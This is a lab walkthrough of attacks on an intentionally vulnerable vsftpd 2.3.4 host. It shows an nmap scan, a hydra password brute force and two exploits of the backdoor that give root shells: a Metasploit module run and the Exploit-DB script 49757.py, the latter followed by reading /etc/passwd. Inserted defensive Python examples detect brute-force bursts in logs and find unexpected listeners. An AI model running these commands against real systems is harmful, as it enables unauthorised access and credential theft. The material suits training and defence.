Network Scan
```console
┌──(root㉿kali)-[/home/kali/Desktop/cd]
└─# nmap -A -sV 192.168.244.136
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-05 15:58 EST
Nmap scan report for 192.168.244.136 (192.168.244.136)
Host is up (0.00064s latency).
Not shown: 977 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.244.140
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
```
VSFTPD 2.3.4 exploit with hydra
First, we need to build a username dictionary and a password dictionary. Here the username list is named usernames.txt and the password list is named passwords.txt.
Then we run hydra with the following command line:
```bash
hydra -L /home/kali/Desktop/cd/mywordlists/usernames.txt -P /home/kali/Desktop/cd/mywordlists/passwords.txt 192.168.244.136 ftp -V
```
Here is what the command line output looks like:
```console
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-26 16:20:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ftp://192.168.244.136:21/
[ATTEMPT] target 192.168.244.136 - login "admin" - pass "admin" - 1 of 25 [child 0] (0/0)
[ATTEMPT] target 192.168.244.136 - login "admin" - pass "msfadmin" - 2 of 25 [child 1] (0/0)
[ATTEMPT] target 192.168.244.136 - login "admin" - pass "root" - 3 of 25 [child 2] (0/0)
[ATTEMPT] target 192.168.244.136 - login "admin" - pass "user" - 4 of 25 [child 3] (0/0)
[ATTEMPT] target 192.168.244.136 - login "admin" - pass "" - 5 of 25 [child 4] (0/0)
[ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "admin" - 6 of 25 [child 5] (0/0)
[ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "msfadmin" - 7 of 25 [child 6] (0/0)
[ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "root" - 8 of 25 [child 7] (0/0)
[ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "user" - 9 of 25 [child 8] (0/0)
[ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "" - 10 of 25 [child 9] (0/0)
[ATTEMPT] target 192.168.244.136 - login "root" - pass "admin" - 11 of 25 [child 10] (0/0)
[ATTEMPT] target 192.168.244.136 - login "root" - pass "msfadmin" - 12 of 25 [child 11] (0/0)
[ATTEMPT] target 192.168.244.136 - login "root" - pass "root" - 13 of 25 [child 12] (0/0)
[ATTEMPT] target 192.168.244.136 - login "root" - pass "user" - 14 of 25 [child 13] (0/0)
[ATTEMPT] target 192.168.244.136 - login "root" - pass "" - 15 of 25 [child 14] (0/0)
[ATTEMPT] target 192.168.244.136 - login "user" - pass "admin" - 16 of 25 [child 15] (0/0)
[21][ftp] host: 192.168.244.136   login: msfadmin   password: msfadmin
[ATTEMPT] target 192.168.244.136 - login "user" - pass "msfadmin" - 17 of 25 [child 6] (0/0)
[ATTEMPT] target 192.168.244.136 - login "user" - pass "root" - 18 of 25 [child 5] (0/0)
[ATTEMPT] target 192.168.244.136 - login "user" - pass "user" - 19 of 25 [child 7] (0/0)
[ATTEMPT] target 192.168.244.136 - login "user" - pass "" - 20 of 25 [child 8] (0/0)
[ATTEMPT] target 192.168.244.136 - login "" - pass "admin" - 21 of 25 [child 9] (0/0)
[ATTEMPT] target 192.168.244.136 - login "" - pass "msfadmin" - 22 of 25 [child 0] (0/0)
[ATTEMPT] target 192.168.244.136 - login "" - pass "root" - 23 of 25 [child 1] (0/0)
[ATTEMPT] target 192.168.244.136 - login "" - pass "user" - 24 of 25 [child 2] (0/0)
[ATTEMPT] target 192.168.244.136 - login "" - pass "" - 25 of 25 [child 4] (0/0)
[21][ftp] host: 192.168.244.136   login: user   password: user
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-05 21:20:47
```
Here we found two accounts that can log in to the FTP server:
```console
ftp 192.168.244.136
Connected to 192.168.244.136.
220 (vsFTPd 2.3.4)
Name (192.168.244.136:kali): msfadmin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||54670|).
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000            0 Oct 21 21:49 gordon.txt
-rw-r--r--    1 1000     1000           29 Oct 30 23:31 myfile.log
-rw-r--r--    1 1000     1000          914 Oct 21 14:59 nmap-list.txt
drwxr-xr-x    6 1000     1000         4096 Apr 28  2010 vulnerable
226 Directory send OK.
ftp> cd /
250 Directory successfully changed.
ftp> pwd
Remote directory: /
ftp> ls
229 Entering Extended Passive Mode (|||54956|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 14  2012 bin
drwxr-xr-x    4 0        0            1024 May 14  2012 boot
lrwxrwxrwx    1 0        0              11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x   13 0        0           13860 Jan 05 20:57 dev
drwxr-xr-x   94 0        0            4096 Jan 05 21:21 etc
drwxr-xr-x    6 0        0            4096 Apr 16  2010 home
drwxr-xr-x    2 0        0            4096 Mar 16  2010 initrd
lrwxrwxrwx    1 0        0              32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x   13 0        0            4096 May 14  2012 lib
drwx------    2 0        0           16384 Mar 16  2010 lost+found
drwxr-xr-x    4 0        0            4096 Mar 16  2010 media
drwxr-xr-x    3 0        0            4096 Apr 28  2010 mnt
-rw-------    1 0        0           57012 Jan 05 20:54 nohup.out
drwxr-xr-x    2 0        0            4096 Mar 16  2010 opt
dr-xr-xr-x  118 0        0               0 Jan 05 20:54 proc
drwxr-xr-x   13 0        0            4096 Jan 05 20:54 root
drwxr-xr-x    2 0        0            4096 May 14  2012 sbin
drwxr-xr-x    2 0        0            4096 Mar 16  2010 srv
drwxr-xr-x   12 0        0               0 Jan 05 20:54 sys
drwxrwxrwt    5 0        0            4096 Jan 05 20:59 tmp
drwxr-xr-x   12 0        0            4096 Apr 28  2010 usr
drwxr-xr-x   14 0        0            4096 Mar 17  2010 var
lrwxrwxrwx    1 0        0              29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
226 Directory send OK.
```
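From the server side, a run like the hydra session above leaves a burst of FAIL LOGIN records followed by OK LOGIN records from the same client in /var/log/vsftpd.log. The following detector is an added example, not part of the original walkthrough: it parses those records, flags any client that exceeds a failure threshold inside a sliding time window, and lists every account that client did log in to (those are the credentials to reset). The log lines are constructed to mirror the 25-try run above.

```python
# Added example (not from the write-up): flag password-guessing bursts in vsftpd logs.
import re
from collections import defaultdict
from datetime import datetime, timedelta
# vsftpd (log_enable=YES) login record, e.g.:
# Fri Jan  5 16:20:39 2024 [pid 2184] [admin] FAIL LOGIN: Client "192.168.244.140"
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None                # not a login record (connects, transfers, ...)
    ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    return ts, m["ip"], m["user"], m["result"]

def detect_bruteforce(lines, threshold=10, window=60):
    """Map each client with >= threshold FAIL LOGINs inside a sliding `window`
    (seconds) to its total failures and every account it did log in to."""
    recent = defaultdict(list)     # ip -> failure timestamps still in window
    failures = defaultdict(int)    # ip -> total failures
    successes = defaultdict(set)   # ip -> usernames that logged in (any time)
    flagged = set()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, ip, user, result = rec
        if result == "OK":
            successes[ip].add(user)
            continue
        failures[ip] += 1
        recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window] + [ts]
        if len(recent[ip]) >= threshold:
            flagged.add(ip)
    return {ip: {"failures": failures[ip], "successful_logins": sorted(successes[ip])}
            for ip in sorted(flagged)}

# Constructed sample: the 25-try hydra run above, one try per second, as vsftpd
# would log it (same user/password order, same two valid pairs).
_WORDS = ["admin", "msfadmin", "root", "user", ""]
_VALID = {("msfadmin", "msfadmin"), ("user", "user")}

def constructed_log(attacker="192.168.244.140", start=datetime(2024, 1, 5, 16, 20, 39)):
    lines = []
    for i, (u, p) in enumerate((u, p) for u in _WORDS for p in _WORDS):
        stamp = (start + timedelta(seconds=i)).strftime("%a %b %d %H:%M:%S %Y")
        ok = "OK" if (u, p) in _VALID else "FAIL"
        lines.append(f'{stamp} [pid {2000 + i}] [{u}] {ok} LOGIN: Client "{attacker}"')
    return lines
```

Feed real lines with `detect_bruteforce(open("/var/log/vsftpd.log"))`; the threshold and window are tuning knobs, and the 16-parallel-task default hydra uses makes even a one-minute window generous.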
VSFTPD 2.3.4 exploit with Metasploit
```console
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 1
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm <x@hdm.io>
  MC <mc@metasploit.com>

Available targets:
  Id  Name
  --  ----
  =>  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the VSFTPD download
  archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
  June 30th 2011 and July 1st 2011 according to the most recent information
  available. This backdoor was removed on July 3rd 2011.

References:
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html


View the full module info with the info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.244.136
rhosts => 192.168.244.136
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.244.136:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.244.136:21 - USER: 331 Please specify the password.
[+] 192.168.244.136:21 - Backdoor service has been spawned, handling...
[+] 192.168.244.136:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
id
[*] Command shell session 1 opened (192.168.244.140:41279 -> 192.168.244.136:6200) at 2024-01-05 16:46:43 -0500

uid=0(root) gid=0(root)
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:d5:0c:8b brd ff:ff:ff:ff:ff:ff
    inet 192.168.244.136/24 brd 192.168.244.255 scope global eth0
    inet6 fe80::20c:29ff:fed5:c8b/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
    link/ether 00:0c:29:d5:0c:95 brd ff:ff:ff:ff:ff:ff
```
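The session line above shows the shell arriving on 192.168.244.136:6200, which means that on the FTP host the backdoor is visible as a root-owned listener on a port no documented service uses. The check below is an added example, not part of the original walkthrough: it parses /proc/net/tcp the way an incident responder would on the suspect host and reports LISTEN sockets outside an expected port set. The /proc/net/tcp snapshot is constructed.

```python
# Added example (not from the write-up): find unexpected TCP listeners on the FTP
# host by reading /proc/net/tcp directly, without trusting an installed netstat/ss.
import socket
import struct

LISTEN = "0A"   # /proc/net/tcp state code for LISTEN

def _hex_ip(h):
    """'88F4A8C0' -> '192.168.244.136' (kernel writes IPv4 in host byte order)."""
    return socket.inet_ntoa(struct.pack("<I", int(h, 16)))

def listeners(proc_net_tcp_text):
    """Parse /proc/net/tcp content into [(ip, port, uid, inode)] for LISTEN sockets."""
    out = []
    for line in proc_net_tcp_text.splitlines()[1:]:        # skip the header row
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN:
            continue
        ip_hex, port_hex = f[1].split(":")
        out.append((_hex_ip(ip_hex), int(port_hex, 16), int(f[7]), int(f[9])))
    return out

def unexpected_listeners(proc_net_tcp_text, expected_ports):
    """Listeners whose port is not in the host's documented service set."""
    return [l for l in listeners(proc_net_tcp_text) if l[1] not in expected_ports]

# Constructed /proc/net/tcp snapshot: FTP (0x15 = 21) and SSH (0x16 = 22) as expected
# services, the root-owned 0.0.0.0:6200 (0x1838) listener the backdoor leaves behind,
# and one ESTABLISHED (state 01) connection from the attacker that must not be reported.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5002 1 0000000000000000 100 0 0 10 0
   2: 00000000:1838 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9713 1 0000000000000000 100 0 0 10 0
   3: 88F4A8C0:1838 8CF4A8C0:A13F 01 00000000:00000000 00:00000000 00000000     0        0 9714 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:   # run this on the suspect host itself
        for ip, port, uid, inode in unexpected_listeners(fh.read(), {21, 22}):
            print(f"unexpected listener {ip}:{port} uid={uid} inode={inode}")
```

The inode in the result can be matched against /proc/*/fd to find the owning process; on a backdoored vsftpd that is a child of the FTP daemon.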
VSFTPD 2.3.4 exploit with Python POC
First, we search for a working POC in Kali's local copy of Exploit-DB with the following command line:
```console
┌──(root㉿kali)-[/home/kali/Desktop/cd]
└─# searchsploit -t vsftpd
----------------------------------------------------------------------------------------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------------------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption   | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)   | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)   | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of                                         | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution                        | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)           | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service                          | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results
```
Next, we copy the POC into the current working directory and run it against the target. The following shows the exploit process:
```console
┌──(root㉿kali)-[/home/kali/Desktop/cd]
└─# searchsploit -m unix/remote/49757.py
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
cp: overwrite '/home/kali/Desktop/cd/49757.py'? yes
Copied to: /home/kali/Desktop/cd/49757.py

┌──(root㉿kali)-[/home/kali/Desktop/cd]
└─# chmod +x 49757.py

┌──(root㉿kali)-[/home/kali/Desktop/cd]
└─# ls
49757.py  wordlists

┌──(root㉿kali)-[/home/kali/Desktop/cd]
└─# python ./49757.py 192.168.244.136
Success, shell opened
Send `exit` to quit shell
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:d5:0c:8b brd ff:ff:ff:ff:ff:ff
    inet 192.168.244.136/24 brd 192.168.244.255 scope global eth0
    inet6 fe80::20c:29ff:fed5:c8b/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
    link/ether 00:0c:29:d5:0c:95 brd ff:ff:ff:ff:ff:ff
pwd
/
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
```